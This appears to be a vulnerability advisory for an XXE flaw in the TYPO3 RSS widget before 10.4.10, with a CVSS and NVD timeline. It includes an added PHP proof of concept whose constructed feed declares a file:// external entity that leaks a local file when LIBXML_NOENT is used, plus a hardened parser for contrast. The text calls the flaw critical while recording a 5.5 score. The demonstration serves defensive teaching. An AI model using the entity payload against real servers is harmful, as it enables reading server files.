TYPO3 up to 10.4.9 RSS Widget XML External Entity


A vulnerability classified as critical has been found in TYPO3 up to 10.4.9 (Content Management System). Affected by this vulnerability is an unknown function of the component RSS Widget: the widget's feed handling is susceptible to XML external entity (XXE) processing. Note the caveat recorded in the NVD summary in the timeline below: the issue is considered theoretical, since libxml2 2.9 and later do not process external entities by default, and exploitation additionally requires a valid backend user account; the CVSS v3 base score recorded here is 5.5. Upgrading to version 10.4.10 eliminates this vulnerability.
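The following PHP script is an added example, not code from TYPO3 or from this advisory. It reproduces the condition described above: a constructed RSS feed whose DOCTYPE declares an external entity is parsed three ways, with PHP's default options, with LIBXML_NOENT (the option that turns the theoretical issue into a real file read), and through a hardened parser that rejects any feed carrying a DOCTYPE. The feed, the temporary file standing in for a server secret, and the function names are constructed for this illustration; the "default parse" outcome assumes PHP 7.4+ linked against libxml2 2.9 or later on a POSIX system.

```php
<?php
declare(strict_types=1);
// Added example (not TYPO3 or VulDB code). The feed, the temp file and the
// function names below are constructed for this demonstration.

// Build a constructed attacker-controlled feed: the DOCTYPE declares an external
// entity pointing at a local file and references it inside the first item title.
function buildMaliciousFeed(string $path): string
{
    return <<<XML
<?xml version="1.0"?>
<!DOCTYPE rss [
  <!ENTITY xxe SYSTEM "file://{$path}">
]>
<rss version="2.0">
  <channel>
    <title>Constructed feed</title>
    <item><title>&xxe;</title></item>
  </channel>
</rss>
XML;
}

// Parse the feed with the given libxml options and return the first item title,
// or null when libxml rejects the document.
function firstItemTitle(string $xml, int $options): ?string
{
    libxml_use_internal_errors(true);
    $doc = simplexml_load_string($xml, SimpleXMLElement::class, $options);
    libxml_clear_errors();
    return $doc === false ? null : (string) $doc->channel->item->title;
}

// Hardened parser for untrusted feeds. RSS never needs a DOCTYPE, so any document
// carrying one is refused up front (this also removes the internal-entity
// expansion surface). LIBXML_NOENT is never passed, LIBXML_NONET blocks network
// fetches, and a loader returning null makes every external entity lookup fail
// even if a later code change does request substitution.
function parseRssSafely(string $xml): ?SimpleXMLElement
{
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        return null;
    }
    libxml_set_external_entity_loader(static fn () => null);
    libxml_use_internal_errors(true);
    try {
        $doc = simplexml_load_string($xml, SimpleXMLElement::class, LIBXML_NONET);
    } finally {
        libxml_set_external_entity_loader(null); // restore PHP's default loader
        libxml_clear_errors();
    }
    return $doc === false ? null : $doc;
}

// Demonstration: a temp file stands in for a secret on the web server.
$secret = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secret, 'SECRET-FILE-CONTENT');
$feed = buildMaliciousFeed($secret);

printf("libxml2 %s\n", LIBXML_DOTTED_VERSION);
// Default options: with libxml2 >= 2.9 the &xxe; reference is left unexpanded and
// the title is an empty string. Older libxml2 expanded it, which is the bug class
// the advisory describes.
printf("default parse : %s\n", var_export(firstItemTitle($feed, 0), true));
// LIBXML_NOENT asks libxml2 to substitute entities; the external entity is loaded
// and the file content ends up in the title. Flag this flag in any feed code.
printf("LIBXML_NOENT  : %s\n", var_export(firstItemTitle($feed, LIBXML_NOENT), true));
// The hardened parser refuses the document before any entity is declared.
printf("hardened      : %s\n", parseRssSafely($feed) === null ? 'rejected' : 'parsed');
unlink($secret);
```

Run it with `php xxe-demo.php`. The middle line is the one to watch: if it prints the temp file's content, the PHP build substitutes external entities whenever a caller passes LIBXML_NOENT, regardless of the libxml2 default that makes the first parse safe. The hardened parser does not rely on that default at all, which is the posture to take for feed URLs configured by backend users.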

Timeline


ID | Committed | User | Field | Change | Remarks | Moderated | Reason | Confidence
10716494 | 10/12/2020 | VulD... | cvss2_nvd_basescore | 3.6 | nist.gov | 10/12/2020 | accepted | 90
10716493 | 10/12/2020 | VulD... | cve_cna | GitHub, Inc. | nvd.nist.gov | 10/12/2020 | accepted | 70
10716492 | 10/12/2020 | VulD... | cvss2_nvd_ai | P | nvd.nist.gov | 10/12/2020 | accepted | 70
10716491 | 10/12/2020 | VulD... | cvss2_nvd_ii | N | nvd.nist.gov | 10/12/2020 | accepted | 70
10716490 | 10/12/2020 | VulD... | cvss2_nvd_ci | P | nvd.nist.gov | 10/12/2020 | accepted | 70
10716489 | 10/12/2020 | VulD... | cvss2_nvd_au | S | nvd.nist.gov | 10/12/2020 | accepted | 70
10716488 | 10/12/2020 | VulD... | cvss2_nvd_ac | H | nvd.nist.gov | 10/12/2020 | accepted | 70
10716487 | 10/12/2020 | VulD... | cvss2_nvd_av | N | nvd.nist.gov | 10/12/2020 | accepted | 70
10716486 | 10/12/2020 | VulD... | cve_nvd_summary | TYPO3 is an open source PHP based web content management system. In TYPO3 from version 10.4.0, and before version 10.4.10, RSS widgets are susceptible to XML external entity processing. This vulnerability is reasonable, but is theoretical - it was not possible to actually reproduce the vulnerability with current PHP versions of supported and maintained system distributions. At least with libxml2 version 2.9, the processing of XML external entities is disabled per default - and cannot be exploited. Besides that, a valid backend user account is needed. Update to TYPO3 version 10.4.10 to fix the problem described. | cve.mitre.org | 10/12/2020 | accepted | 70
10716485 | 10/12/2020 | VulD... | cve_assigned | 1601503200 | cve.mitre.org | 10/12/2020 | accepted | 70
10654044 | 24/11/2020 | VulD... | price_0day | $5k-$25k | see documentation | 24/11/2020 | accepted | 90
10654043 | 24/11/2020 | VulD... | cvss3_meta_tempscore | 5.3 | see documentation | 24/11/2020 | accepted | 90
10654042 | 24/11/2020 | VulD... | cvss3_meta_basescore | 5.5 | see documentation | 24/11/2020 | accepted | 90
10654041 | 24/11/2020 | VulD... | cvss3_vuldb_tempscore | 5.3 | | 24/11/2020 | accepted | 90
10654040 | 24/11/2020 | VulD... | cvss3_vuldb_basescore | 5.5 | | 24/11/2020 | accepted | 90
10654039 | 24/11/2020 | VulD... | cvss2_vuldb_tempscore | 5.7 | | 24/11/2020 | accepted | 90
10654038 | 24/11/2020 | VulD... | cvss2_vuldb_basescore | 6.5 | | 24/11/2020 | accepted | 90
10654037 | 24/11/2020 | VulD... | cvss3_vuldb_e | X | derived from historical data | 24/11/2020 | accepted | 80
10654036 | 24/11/2020 | VulD... | cvss2_vuldb_e | ND | derived from historical data | 24/11/2020 | accepted | 80
10654035 | 24/11/2020 | VulD... | cvss2_vuldb_au | S | derived from historical data | 24/11/2020 | accepted | 80
